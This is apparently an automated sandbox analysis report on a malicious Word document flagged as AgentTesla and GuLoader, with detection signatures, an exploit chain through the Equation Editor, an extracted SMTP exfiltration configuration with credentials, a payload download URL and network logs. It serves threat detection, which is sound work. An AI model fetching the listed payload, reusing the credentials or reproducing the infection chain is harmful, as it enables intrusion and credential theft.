Windows Analysis Report
COACH APRIL ORDER.doc

Overview

General Information

Sample name:	COACH APRIL ORDER.doc
Analysis ID:	1427895
MD5:	e639a26040e4180f739ee0cd78f65c64
SHA1:	7f7aee13556a622d65bf1a2387bb74b9e728430b
SHA256:	b31ab1aa44953eb1e2371a7c4750ab24ac44497ee45244f7fe5940d9280f0ab5
Tags:	doc
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Yara detected GuLoader

Check if machine is in data center or colocation facility

Creates multiple autostart registry keys

Document exploit detected (process start blacklist hit)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Installs new ROOT certificates

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Potential malicious VBS script found (suspicious strings)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Searches for Windows Mail specific files

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Writes or reads registry keys via WMI

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Found malware configuration

Source: powershell.exe.3276.20.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "abbafather@myhydropowered.com", "Username": "waymaker@myhydropowered.com", "Password": "18 Apr 2024 16:0"}

Multi AV Scanner detection for domain / URL

Source: mail.myhydropowered.com	Virustotal: Detection: 5%	Perma Link
Source: covid19help.top	Virustotal: Detection: 24%	Perma Link
Source: http://mail.myhydropowered.com	Virustotal: Detection: 5%	Perma Link
Source: https://covid19help.top/	Virustotal: Detection: 23%	Perma Link
Source: https://covid19help.top/Transfusionist.vbs	Virustotal: Detection: 22%	Perma Link

Multi AV Scanner detection for submitted file

Source: COACH APRIL ORDER.doc	Virustotal: Detection: 53%			Perma Link
Source: COACH APRIL ORDER.doc	ReversingLabs: Detection: 50%

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.67.175.222 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.102:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49183 version: TLS 1.2

Source:	Binary string: 5c561934e089\System.Core.pdb@ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Management.Automation.pdbpdbion.pdbC source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdbSIL\System.Core\v4.0_4.0.0.0_ source: powershell.exe, 0000000A.00000002.437981403.0000000004E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B87A ShellExecuteW,ExitProcess,	2_2_0062B87A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_0062B84C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B7CB LoadLibraryW,	2_2_0062B7CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B865 ShellExecuteW,ExitProcess,	2_2_0062B865
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B70A ExitProcess,	2_2_0062B70A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B89F ExitProcess,	2_2_0062B89F

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: covid19help.top
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: x1.i.lencr.org
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: ip-api.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com
Source: global traffic	DNS query: name: mail.myhydropowered.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.217.215.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 104.26.12.205:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 208.95.112.1:80
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 208.95.112.1:80
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 208.95.112.1:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.217.215.138:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
